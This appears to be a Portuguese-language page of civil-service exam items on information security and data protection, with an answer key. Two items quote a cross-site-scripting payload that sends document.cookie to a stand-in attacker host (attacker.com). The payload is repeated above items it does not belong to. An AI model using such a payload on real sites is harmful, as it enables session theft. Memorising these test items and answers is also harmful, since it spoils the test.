Questões de Concurso Público Ministério da Economia 2020 para Tecnologia da Informação - Segurança da Informação e Proteção de Dados

Foram encontradas 120 questões

Q1616607 Segurança da Informação
Julgue o próximo item, a respeito de criptografia, ataque a rede de computadores e segurança de servidores e de estações de trabalho.

Honeypot é uma técnica pela qual um atacante utiliza um equipamento conectado à rede de computadores para tirar de operação um serviço, um computador ou toda uma rede conectada à Internet.
Alternativas
Q1616608 Segurança da Informação

Acerca de software malicioso e segurança da infraestrutura de TI, julgue o item subsecutivo.


Contêineres têm sido usados como mecanismo de implantação de malware na infraestrutura em nuvem, sendo o H2Miner um exemplo de botnet capaz de utilizar esse tipo de mecanismo.


Alternativas
Q1616609 Segurança da Informação

Acerca de software malicioso e segurança da infraestrutura de TI, julgue o item subsecutivo.


O malware Kinsing executa um minerador de criptomoeda e tenta se espalhar ainda mais, visando tanto a contêineres quanto a hosts, e, na última fase da execução desse malware, é criado um cryptominer chamado Kdevtmpfsi.

Alternativas
Q1616610 Redes de Computadores

Acerca de software malicioso e segurança da infraestrutura de TI, julgue o item subsecutivo.


Spam é uma funcionalidade do SMTP que permite o recebimento de emails de clientes e a sua retransmissão para outro servidor SMTP.


Alternativas
Q1616611 Segurança da Informação

Acerca de software malicioso e segurança da infraestrutura de TI, julgue o item subsecutivo.


O ransomware Boop, pertencente à família DJVU/STOP, é um malware que codifica somente os primeiros 150 kB de arquivos de vídeo, documentos e fotos, mediante um forte algoritmo de criptografia.

Alternativas
Q1616612 Segurança da Informação

Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.


Fingerprint é a fase do footprint que tem por objetivo a identificação do endereço IP do host alvo.

Alternativas
Q1616613 Segurança da Informação

Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.


As técnicas de footprint são fundamentais em um processo de pen-test, para identificação de informações, tanto em black box, quando a execução é feita sem conhecimento da estrutura, quanto em white box, quando a execução é feita com algum conhecimento da estrutura.


Alternativas
Q1616614 Sistemas Operacionais

Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.


Em uma máquina com o Ubuntu 16.04.6 LTS na qual esteja instalado o servidor nginx 1.10.3 configurado com o valor off atribuído à variável server_tokens, a execução do comando nmap -sV localhost -p80 nessa máquina gerará o resultado a seguir, relacionado à porta analisada. 80/tcp open http nginx 1.10.3 (Ubuntu)

Alternativas
Q1616615 Segurança da Informação

Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue o item a seguir.


Considere que uma aplicação use a seguinte informação não confiável na construção do HTML, sem validação ou escaping


Imagem associada para resolução da questão


Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


Imagem associada para resolução da questão


Nesse caso, o risco de segurança da aplicação é a desserialização insegura.

Alternativas
Q1616616 Segurança da Informação

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

Alternativas
Q1616617 Segurança da Informação

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.

Alternativas
Q1616618 Engenharia de Software
Julgue os item seguinte, a respeito de respostas a incidentes, desenvolvimento de software e configuração de servidores.

Engenharia reversa consiste em descobrir a senha de um arquivo e(ou) sistema por meio de um processo de tentativa e erro.
Alternativas
Q1616619 Sistemas Operacionais
Julgue os item seguinte, a respeito de respostas a incidentes, desenvolvimento de software e configuração de servidores.

O espaço existente entre os fins lógico e físico de um arquivo é denominado file slack, um tipo de desperdício presente em qualquer sistema de arquivos, com qualquer tamanho de bloco, pois dificilmente os arquivos terão tamanho com um valor múltiplo do tamanho do bloco.
Alternativas
Q1616620 Sistemas Operacionais
Julgue os item seguinte, a respeito de respostas a incidentes, desenvolvimento de software e configuração de servidores.

O registro do sistema operacional Windows consiste em um banco de dados com informações relativas ao hardware, ao software, a drivers, a perfis, a configurações, entre outras informações relevantes ao funcionamento do sistema.
Alternativas
Q1616621 Segurança da Informação
Julgue os item seguinte, a respeito de respostas a incidentes, desenvolvimento de software e configuração de servidores.
É correto firmar que, a seguir, é ilustrado o conteúdo típico de um arquivo de log de um serviço de email, obtido por meio do comando more /var/log/maillog.
Aug 10 14:14:01 localhost sendmail[4768]: h7ALE1t04 763: [email protected], ctladdr=apache (48/48 ), delay=00:00:00, xdelay=00:00:00, mailer=esmtp, p ri=31300, relay=mx1.mail.yahoo.com. [64.157.4.78], d sn=2.0.0, stat=Sent (ok dirdel)
Alternativas
Q1616622 Segurança da Informação
Julgue os item seguinte, a respeito de respostas a incidentes, desenvolvimento de software e configuração de servidores.
A primeira fase de uma investigação forense é a preparação, que consiste em elaborar um checklist de ações que devem ser tomadas, preparar as ferramentas necessárias e eliminar quaisquer dados que possam existir nos discos e dispositivos utilizados para gravar as evidências.
Alternativas
Q1616623 Legislação Federal
Acerca da classificação da informação quanto ao grau e aos prazos de sigilo, julgue o item subsecutivos, com base na Lei n.º 12.527/2011.

Na classificação da informação em determinado grau de sigilo, deve-se observar o interesse do órgão e utilizar o critério mais restritivo possível.
Alternativas
Q1616624 Arquivologia
Acerca da classificação da informação quanto ao grau e aos prazos de sigilo, julgue o item subsecutivos, com base na Lei n.º 12.527/2011.

O prazo máximo de restrição de acesso a informações classificadas no grau ultrassecreto é de vinte e cinco anos.
Alternativas
Q1616625 Segurança da Informação
Com relação às políticas de auditoria na gestão de segurança da informação, julgue o item seguinte, com base no Decreto n.º 9.637/2018.
Cabe aos órgãos e às entidades da administração pública federal, em seu âmbito de atuação, analisar os resultados dos trabalhos de auditoria sobre a gestão de segurança da informação.
Alternativas
Q1616626 Segurança da Informação
Com relação às políticas de auditoria na gestão de segurança da informação, julgue o item seguinte, com base no Decreto n.º 9.637/2018.
O referido decreto estabelece que qualquer auditoria de segurança da informação deve ser autorizada pelo gestor de tecnologia da informação do órgão.
Alternativas
Respostas
61: E
62: C
63: C
64: E
65: C
66: E
67: C
68: E
69: E
70: C
71: C
72: E
73: C
74: C
75: C
76: C
77: E
78: C
79: C
80: E